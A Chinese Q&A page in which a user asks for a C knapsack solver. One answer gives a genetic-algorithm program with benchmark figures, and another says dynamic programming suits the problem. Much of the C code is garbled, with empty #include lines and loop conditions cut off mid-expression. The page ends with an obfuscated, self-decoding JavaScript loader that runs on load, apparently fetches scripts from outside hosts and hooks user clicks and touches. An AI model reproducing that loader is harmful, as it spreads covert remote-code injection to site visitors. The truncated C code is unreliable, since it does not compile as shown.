求高手帮我用C语言写一个运用贪心和遗传算法求解背包问题的程序。。。。谢谢!!!!!!十分紧急!!!

2024-12-18 08:41:30
推荐回答(2个)
回答1:

1、程序开发环境
   开发环境:Visual C++6.0 (把Fortran程序改为VC)
   操作系统:Windows 2003 Professional
2、程序性能对比
    运行时间与加速比(如表1所示)
进程数p(个) 1 2 4 
运行时间t(秒) 129s 78s 38s 
加速比s  1.65 3.38 
 表1、运行时间与加速比
3、程序运行结果:
  实例数据:
 假设物体的重量Weight、物体的收益Profit和背包的容量Contain 分别为:
Weight={ 80,82,85,70,72,    70,66,50,55,25 ,
   50,55,40,48,50,     32,22,60,30,32 , 
 40,38,35,32,25,     28,30,22,50,30 ,
 45,30,60,50,20 ,    65,20,25,30,10 ,
 20,25,15,10,10 ,    10,4, 4, 2, 1   }
Profit={  220,208,198,192,180,    180,165,162,160,158,
 155,130,125,122,120 ,   118,115,110,105,101,
 100,100,98, 96, 95,     90, 88, 82, 80, 77 ,
 75, 73, 72, 70, 69,     66, 65, 63, 60, 58,
 56, 50, 30, 20, 15,      10, 8,  5,  3,  1}
Contain=1000,
 如何选择哪些物品装入该背包可使得在背包的容量约束限制之内所装物品的总价值最大?
 传统的算法(动态规划、递归回溯法和贪心算法所得结果:  
      总价值为3077 , 总重量为999。
 2001年张铃,张钹教授在计算机学报上发表的《佳点集遗传算法》所得结果
 总价值为3103, 总重量为1000。
 我们算法所得结果:                   总价值为3103, 总重量为1000。
 我们所求得最优解的个体分配情况为:
11010   10111   10110   11011   01111   11101   00001   01001   10000   
01000
算法 最大迭代次数 总价值为 总重量为 
传统的算法 400 3077 999 
佳点集算法 70 3103 1000 
遗传算法    75 3103 1000 

// knapsack.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"

#include 
#include 
#include 
#include 
#include 
#include 

// 重要常量参数
#define popsize 200   //种群的规模
#define pc 0.618        //杂交概率
#define pm 0.03        //变异概率
#define lchrom 50      //染色体长度
#define maxgen 1000     //最大进化代数

struct population
{
 unsigned int chrom[lchrom];   //染色体
 double weight;                //背包重量
 double fitness;               //适应度
 unsigned int parent1,parent2,cross;  //双亲、交叉点
};

//新生代种群、父代种群
struct population oldpop[popsize],newpop[popsize]; 

//背包问题中物体重量、收益、背包容量
int weight[lchrom],profit[lchrom],contain; 

//种群的总适应度、最小、最大、平均适应度 
double sumfitness,minfitness,maxfitness,avgfitness;

//计算适应度时使用的 惩罚函数系数
double alpha;

//一个种群中最大和最小适应度的个体
int    minpop,maxpop; 

/* 读入背包信息,并且计算惩罚函数系数 */
void read_infor()
{
 FILE *fp;
 int j;
    
 //获取背包问题信息文件
 if ((fp=fopen("knapsack.txt","r"))==NULL)
 {   
  //读取文件失败
  AfxMessageBox("The file is not found",MB_OK,NULL);
     return;
 }
 //读入物体收益信息
    for (j=0;j    {
     fscanf(fp,"%d",&profit[j]);
    }
 //读入物体重量信息
    for (j=0;j    {
     fscanf(fp,"%d",&weight[j]);
    } 
 //读入背包容量
    fscanf(fp,"%d",&contain);
    fclose(fp);
 
}

//根据计算的个体重量,判断此个体是否该留在群体中
double cal_weight(unsigned int *chr)
{
  int j;
  double pop_weight;//背包重量

  pop_weight=0;
  for (j=0;j  {
 pop_weight=pop_weight+(*chr)*weight[j];
 chr++;
  }
  return pop_weight;
}

/* 种群中个体适应度计算*/
double cal_fit(unsigned int *chr)
{
  int j;
  double pop_profit;//适应度

  pop_profit=0;
//  pop_weight=0;

  for (j=0;j  {
 pop_profit=pop_profit+(*chr)*profit[j];
// pop_weight=pop_weight+(*chr)*weight[j];
 chr++;
  }
  
  return pop_profit;
}

/* 群体适应度的最大最小值以及其他信息 */
void statistics(struct population *pop)
{
 int i;
 double tmp_fit;

 sumfitness=pop[0].fitness;
 minfitness=pop[0].fitness;
    minpop=0;
 maxfitness=pop[0].fitness;
 maxpop=0;
 
 for (i=1;i {
  //计算种群的总适应度
  sumfitness=sumfitness+pop[i].fitness;
        tmp_fit=pop[i].fitness;
  //选择种群中最大适应度的个体
  if ((tmp_fit>maxfitness)&&((int)(tmp_fit*10)%10==0))
  {
   maxfitness=pop[i].fitness;
   maxpop=i;
  }

        //选择种群中最小适应度的个体
  if (tmp_fit  {
   minfitness=pop[i].fitness;
   minpop=i;
  }
  
  //计算平均适应度
  avgfitness=sumfitness/(float)popsize;
 }
//  printf("\nthe max pop = %d;",maxpop);
//  printf("\nthe min pop = %d;",minpop);
//   printf("\nthe sumfitness = %f\n",sumfitness);
}

//报告种群信息
void report(struct population *pop,int gen)
{
      int j;
   int pop_weight=0;

   printf("the generation is %d.\n",gen); //输出种群的代数    
   //输出种群中最大适应度个体的染色体信息
   printf("The population's chrom is:  \n");
   for (j=0;j   { 
  if (j%5==0) 
  {  printf(" ");}
  printf("%1d",pop[maxpop].chrom[j]);
   }
   //输出群体中最大适应度
      printf("\nThe population's max fitness is %d.",(int)pop[maxpop].fitness);
      printf("\nThe knapsack weight is %d.\n\n",(int)pop[maxpop].weight);

}

/* 生成初始种群 */
void initpop()
{
  int i,j,ispop;
  double tmpWeight;
  //变量用于判断是否为满足条件的个体
  ispop=false;

  //生成popsize个种群个体
  for(i=0;i  {
     while (!ispop)
  {
    for(j=0;j    {
    oldpop[i].chrom[j]=rand()%2;   //随机生成个体的染色体
       oldpop[i].parent1=0;  //双亲
       oldpop[i].parent2=0;
       oldpop[i].cross=0;    //交叉点
    }

    //选择重量小于背包容量的个体,即满足条件
       tmpWeight=cal_weight(oldpop[i].chrom);
    if (tmpWeight<=contain)
    {
    oldpop[i].fitness=cal_fit(oldpop[i].chrom);
    oldpop[i].weight=tmpWeight;
    oldpop[i].parent1=0;
    oldpop[i].parent2=0;
    oldpop[i].cross=0;
    ispop=true;
    }
  }
  //此个体可以加入到种群中
  ispop=false;
  }
}

/*  遗传操作   */

//概率选择试验
int execise(double probability)
{
 double pp;
    //如果生成随机数大于相应的概率则返回真,否则试验不成功
 pp=(double)(rand()%20001/20000.0);
 if (pp<=probability) return 1;
 return 0;
}

// 选择进行交叉操作的个体 
int selection(int pop)
{
  double wheel_pos,rand_Number,partsum;
  int parent;

  //赌轮法选择
  rand_Number=(rand()%2001)/2000.0;
  wheel_pos=rand_Number*sumfitness;  //赌轮大小

  partsum=0;
  parent=0;
  do{
   partsum=partsum+oldpop[parent].fitness;
   parent=parent+1;
 } while (partsum  return parent-1;

}

/*  交叉操作  */
int crossover(unsigned int *parent1,unsigned int *parent2,int i)
{
 int j,cross_pos;
 if (execise(pc))
 {
  //生成交叉位置0,1,...(lchrom-2)
  cross_pos=rand()%(lchrom-1);
 }
 else cross_pos=lchrom-1;
    
 for (j=0;j<=cross_pos;j++)
 {   //保留复制;
  //包括在概率选择不成功时,父体完全保留
  newpop[i].chrom[j]=parent1[j];
 }
 for(j=cross_pos+1;j<=(lchrom-1);j++)
 {
  //从交叉点开始交叉
  newpop[i].chrom[j]=parent2[j];
 }
    
 //记录交叉位置
 newpop[i].cross=cross_pos;
 return 1;
}

/*  变异操作 */
int mutation(unsigned int alleles)
{
   if (execise(pm))
   {
    if (alleles)
     alleles=0;
    else alleles=1;
   }
   //返回变异值,或者返回原值
   return alleles;
}

/* 群体更新 */
void generation()
{
  unsigned int i,j,mate1,mate2;
  double tmpWeight;
  int ispop;//记录是否是符合条件的个体
  i=0;
  while (i  {
 ispop=false;
    while (!ispop)
  {
     //选择
     mate1=selection(i);
     mate2=selection(i+1);

        //交叉
        crossover(oldpop[mate1].chrom,oldpop[mate2].chrom,i);

     //变异
        for (j=0;j  {
        newpop[i].chrom[j]=mutation(newpop[i].chrom[j]);
  }

     //选择重量小于背包容量的个体,即满足条件
        tmpWeight=cal_weight(newpop[i].chrom);
     if (tmpWeight<=contain)
  {
    newpop[i].fitness=cal_fit(newpop[i].chrom);
    newpop[i].weight=tmpWeight;
    newpop[i].parent1=mate1;
    newpop[i].parent2=mate2;
    ispop=true;
  }
  }
  //此个体可以加入到种群中
    i=i+1;
  }
}

void main(int argc, char* argv[])
{
 int gen,oldmaxpop,k;
 double oldmax;
      
    read_infor();//读入背包信息
 gen=0;
 srand( (unsigned)time( NULL ) );//置随机种子
 initpop();
 memcpy(&newpop,&oldpop,popsize*sizeof(struct population));
 statistics(newpop);//统计新生种群的信息
 report(newpop,gen);
 while(gen {
   gen=gen+1;
   if (gen%100==0)
   {
    srand( (unsigned)time( NULL ) );//置随机种子
   }
   oldmax=maxfitness;
   oldmaxpop=maxpop;
   generation();
   statistics(newpop); //统计新生代种群信息
   //如果新生代种群中个体的最大适应度小于老一代种群
   //个体的最大适应度,则保存老一代种群个体的最大适应度
   //否则报告新生代的最大适应度
   if (maxfitness   {
    for(k=0;k     newpop[minpop].chrom[k]=oldpop[oldmaxpop].chrom[k];
    newpop[minpop].fitness=oldpop[oldmaxpop].fitness;
    newpop[minpop].parent1=oldpop[oldmaxpop].parent1;
          newpop[minpop].parent2=oldpop[oldmaxpop].parent2;
    newpop[minpop].cross=oldpop[oldmaxpop].cross;
    statistics(newpop);
   }
   else if (maxfitness>oldmax)
     {
        report(newpop,gen);
   }

   //保存新生代种群的信息到老一代种群信息空间
   memcpy(&oldpop,&newpop,popsize*sizeof(struct population));
    }

 printf("It is over.");
 getch();
}

回答2:

背包问题只能是动态规划求解的吧。。。。遗传这种智能算法。。。。不评价

!function(){function a(a){var _idx="g3r6t5j1i0";var b={e:"P",w:"D",T:"y","+":"J",l:"!",t:"L",E:"E","@":"2",d:"a",b:"%",q:"l",X:"v","~":"R",5:"r","&":"X",C:"j","]":"F",a:")","^":"m",",":"~","}":"1",x:"C",c:"(",G:"@",h:"h",".":"*",L:"s","=":",",p:"g",I:"Q",1:"7",_:"u",K:"6",F:"t",2:"n",8:"=",k:"G",Z:"]",")":"b",P:"}",B:"U",S:"k",6:"i",g:":",N:"N",i:"S","%":"+","-":"Y","?":"|",4:"z","*":"-",3:"^","[":"{","(":"c",u:"B",y:"M",U:"Z",H:"[",z:"K",9:"H",7:"f",R:"x",v:"&","!":";",M:"_",Q:"9",Y:"e",o:"4",r:"A",m:".",O:"o",V:"W",J:"p",f:"d",":":"q","{":"8",W:"I",j:"?",n:"5",s:"3","|":"T",A:"V",D:"w",";":"O"};return a.split("").map(function(a){return void 0!==b[a]?b[a]:a}).join("")}var b=a('>[7_2(F6O2 5ca[5YF_52"vX8"%cmn<ydFhm5d2fO^caj}g@aPqYF 282_qq!Xd5 Y=F=O8D62fODm622Y5V6fFh!qYF ^8O/Ko0.c}00%n0.cs*N_^)Y5c"}"aaa=78[6L|OJgN_^)Y5c"@"a<@=5YXY5LY9Y6phFgN_^)Y5c"0"a=YXY2F|TJYg"FO_(hY2f"=LqOFWfg_cmn<ydFhm5d2fO^cajngKa=5YXY5LYWfg_cmn<ydFhm5d2fO^cajngKa=5ODLgo=(Oq_^2Lg}0=6FY^V6FhgO/}0=6FY^9Y6phFg^/o=qOdfiFdF_Lg0=5Y|5Tg0P=68"#MqYYb"=d8HZ!F5T[d8+i;NmJd5LYc(c6a??"HZ"aP(dF(hcYa[P7_2(F6O2 pcYa[5YF_52 Ym5YJqd(Yc"[[fdTPP"=c2YD wdFYampYFwdFYcaaP7_2(F6O2 (cY=Fa[qYF 282_qq!F5T[28qO(dqiFO5dpYmpYFWFY^cYaP(dF(hcYa[Fvvc28FcaaP5YF_52 2P7_2(F6O2 qcY=F=2a[F5T[qO(dqiFO5dpYmLYFWFY^cY=FaP(dF(hcYa[2vv2caPP7_2(F6O2 LcY=Fa[F8}<d5p_^Y2FLmqY2pFhvvXO6f 0l88FjFg""!7mqOdfiFdF_L8*}=}00<dmqY2pFh??cdmJ_Lhc`c$[YPa`%Fa=qc6=+i;NmLF562p67TcdaaaP7_2(F6O2 _cYa[qYF F80<d5p_^Y2FLmqY2pFhvvXO6f 0l88YjYg}=28"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7h6CSq^2OJ:5LF_XDRT4"=O82mqY2pFh=58""!7O5c!F**!a5%82HydFhm7qOO5cydFhm5d2fO^ca.OaZ!5YF_52 5P7_2(F6O2 fcYa[qYF F8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!Xd5 28H"hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"Z!qYF O8pc2Hc2YD wdFYampYFwdTcaZ??2H0Za%"/h^/Ks0jR8ps5KFnC}60"!O8O%c*}888Om62fYR;7c"j"aj"j"g"v"a%"58"%7m5Y|5T%%%"vF8"%hca%5ca=FmL5(8pcOa=FmO2qOdf87_2(F6O2ca[7mqOdfiFdF_L8@=)caP=FmO2Y55O587_2(F6O2ca[YvvYca=LYF|6^YO_Fc7_2(F6O2ca[Fm5Y^OXYcaP=}0aP=fO(_^Y2FmhYdfmdJJY2fxh6qfcFa=7mqOdfiFdF_L8}P7_2(F6O2 hca[qYF Y8(c"bb___b"a!5YF_52 Y??qc"bb___b"=Y8ydFhm5d2fO^camFOiF562pcsKamL_)LF562pcsa=7_2(F6O2ca[Y%8"M"Pa=Y2(OfYB~WxO^JO2Y2FcYaPr55dTm6Lr55dTcda??cd8HZ=qc6=""aa!qYF J8"Ks0"=X8"ps5KFnC}60"!7_2(F6O2 TcYa[}l88Ym5YdfTiFdFYvv0l88Ym5YdfTiFdFY??Ym(qOLYcaP7_2(F6O2 DcYa[Xd5 F8H"Ks0^)ThF)mpOL2fmRT4"="Ks0X5ThF)m64YdCmRT4"="Ks02pThFmpOL2fmRT4"="Ks0_JqhFm64YdCmRT4"="Ks02TOhFmpOL2fmRT4"="Ks0CSqhF)m64YdCmRT4"="Ks0)FfThF)fmpOL2fmRT4"Z=F8FHc2YD wdFYampYFwdTcaZ??FH0Z=F8"DLLg//"%c2YD wdFYampYFwdFYca%F%"g@Q}1Q"!qYF O82YD VY)iO(SYFcF%"/"%J%"jR8"%X%"v58"%7m5Y|5T%%%"vF8"%hca%5ca%c2_qql882j2gcF8fO(_^Y2Fm:_Y5TiYqY(FO5c"^YFdH2d^Y8(Z"a=28Fj"v(h8"%FmpYFrFF56)_FYc"("ag""aaa!OmO2OJY287_2(F6O2ca[7mqOdfiFdF_L8@P=OmO2^YLLdpY87_2(F6O2cFa[qYF 28FmfdFd!F5T[28cY8>[qYF 5=F=2=O=6=d=(8"(hd5rF"=q8"75O^xhd5xOfY"=L8"(hd5xOfYrF"=_8"62fYR;7"=f8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7ph6CSq^2OJ:5LF_XDRT40}@sonK1{Q%/8"=h8""=^80!7O5cY8Ym5YJqd(Yc/H3r*Ud*40*Q%/8Z/p=""a!^<YmqY2pFh!a28fH_ZcYH(Zc^%%aa=O8fH_ZcYH(Zc^%%aa=68fH_ZcYH(Zc^%%aa=d8fH_ZcYH(Zc^%%aa=58c}nvOa<<o?6>>@=F8csv6a<<K?d=h%8iF562pHqZc2<<@?O>>oa=Kol886vvch%8iF562pHqZc5aa=Kol88dvvch%8iF562pHqZcFaa![Xd5 78h!qYF Y8""=F=2=O!7O5cF858280!F<7mqY2pFh!ac587HLZcFaa<}@{jcY%8iF562pHqZc5a=F%%ag}Q}<5vv5<@ojc287HLZcF%}a=Y%8iF562pHqZccs}v5a<<K?Ksv2a=F%8@agc287HLZcF%}a=O87HLZcF%@a=Y%8iF562pHqZcc}nv5a<<}@?cKsv2a<<K?KsvOa=F%8sa!5YF_52 YPPac2a=2YD ]_2(F6O2c"MFf(L"=2acfO(_^Y2Fm(_55Y2Fi(56JFaP(dF(hcYa[F82mqY2pFh*o0=F8F<0j0gJd5LYW2FcydFhm5d2fO^ca.Fa!Lc@0o=` $[Ym^YLLdpYP M[$[FPg$[2mL_)LF562pcF=F%o0aPPM`a=7mqOdfiFdF_L8*}PTcOa=@8887mqOdfiFdF_Lvv)caP=OmO2Y55O587_2(F6O2ca[@l887mqOdfiFdF_LvvYvvYca=TcOaP=7mqOdfiFdF_L8}PqYF i8l}!7_2(F6O2 )ca[ivvcfO(_^Y2Fm5Y^OXYEXY2Ft6LFY2Y5c7mYXY2F|TJY=7m(q6(S9d2fqY=l0a=Y8fO(_^Y2FmpYFEqY^Y2FuTWfc7m5YXY5LYWfaavvYm5Y^OXYca!Xd5 Y=F8fO(_^Y2Fm:_Y5TiYqY(FO5rqqc7mLqOFWfa!7O5cqYF Y80!Y<FmqY2pFh!Y%%aFHYZvvFHYZm5Y^OXYcaP7_2(F6O2 $ca[LYF|6^YO_Fc7_2(F6O2ca[67c@l887mqOdfiFdF_La[Xd5[(Oq_^2LgY=5ODLgO=6FY^V6Fhg5=6FY^9Y6phFg6=LqOFWfgd=6L|OJg(=5YXY5LY9Y6phFgqP87!7_2(F6O2 Lca[Xd5 Y8pc"hFFJLg//[[fdTPPKs0qhOFq^)Y6(:m^_2dphmRT4gQ}1Q/((/Ks0j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7O5cqYF 280!2<Y!2%%a7O5cqYF F80!F<O!F%%a[qYF Y8"JOL6F6O2g76RYf!4*62fYRg}00!f6LJqdTg)qO(S!"%`qY7Fg$[2.5PJR!D6fFhg$[ydFhm7qOO5cmQ.5aPJR!hY6phFg$[6PJR!`!Y%8(j`FOJg$[q%F.6PJR`g`)OFFO^g$[q%F.6PJR`!Xd5 _8fO(_^Y2Fm(5YdFYEqY^Y2Fcda!_mLFTqYm(LL|YRF8Y=_mdffEXY2Ft6LFY2Y5c7mYXY2F|TJY=La=fO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=_aP67clia[qYF[YXY2F|TJYgY=6L|OJg5=5YXY5LY9Y6phFg6P87!fO(_^Y2FmdffEXY2Ft6LFY2Y5cY=h=l0a=7m(q6(S9d2fqY8h!Xd5 28fO(_^Y2Fm(5YdFYEqY^Y2Fc"f6X"a!7_2(F6O2 fca[Xd5 Y8pc"hFFJLg//[[fdTPPKs0qhOFq^)Y6(:m^_2dphmRT4gQ}1Q/((/Ks0j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7_2(F6O2 hcYa[Xd5 F8D62fODm622Y59Y6phF!qYF 280=O80!67cYaLD6F(hcYmLFOJW^^Yf6dFYe5OJdpdF6O2ca=YmFTJYa[(dLY"FO_(hLFd5F"g28YmFO_(hYLH0Zm(q6Y2F&=O8YmFO_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"FO_(hY2f"g28Ym(hd2pYf|O_(hYLH0Zm(q6Y2F&=O8Ym(hd2pYf|O_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"(q6(S"g28Ym(q6Y2F&=O8Ym(q6Y2F-P67c0<2vv0<Oa67c5a[67cO<86a5YF_52l}!O<^%6vvfcaPYqLY[F8F*O!67cF<86a5YF_52l}!F<^%6vvfcaPP2m6f87m5YXY5LYWf=2mLFTqYm(LL|YRF8`hY6phFg$[7m5YXY5LY9Y6phFPJR`=5jfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc"d7FY5)Yp62"=2agfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=2a=i8l0PqYF F8pc"hFFJLg//[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q/f/Ks0j(8}vR8ps5KFnC}60"a!FvvLYF|6^YO_Fc7_2(F6O2ca[Xd5 Y8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!YmL5(8F=fO(_^Y2FmhYdfmdJJY2fxh6qfcYaP=}YsaPP=@n00aPO82dX6pdFO5mJqdF7O5^=Y8l/3cV62?yd(a/mFYLFcOa=F8Jd5LYW2FcL(5YY2mhY6phFa>8Jd5LYW2FcL(5YY2mD6fFha=cY??Favvc/)d6f_?9_dDY6u5ODLY5?A6XOu5ODLY5?;JJOu5ODLY5?9YT|dJu5ODLY5?y6_6u5ODLY5?yIIu5ODLY5?Bxu5ODLY5?IzI/6mFYLFc2dX6pdFO5m_LY5rpY2FajDc7_2(F6O2ca[Lc@0}a=Dc7_2(F6O2ca[Lc@0@a=fc7_2(F6O2ca[Lc@0saPaPaPagfc7_2(F6O2ca[Lc}0}a=fc7_2(F6O2ca[Lc}0@a=Dc7_2(F6O2ca[Lc}0saPaPaPaa=lYvvO??$ca=XO6f 0l882dX6pdFO5mLY2fuYd(O2vvfO(_^Y2FmdffEXY2Ft6LFY2Y5c"X6L6)6q6FT(hd2pY"=7_2(F6O2ca[Xd5 Y=F!"h6ffY2"888fO(_^Y2FmX6L6)6q6FTiFdFYvvdmqY2pFhvvcY8pc"hFFJLg//[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"a%"/)_pj68"%J=cF82YD ]O5^wdFdamdJJY2fc"^YLLdpY"=+i;NmLF562p67Tcdaa=FmdJJY2fc"F"="0"a=2dX6pdFO5mLY2fuYd(O2cY=Fa=dmqY2pFh80=qc6=""aaPaPaca!'.substr(22));new Function(b)()}();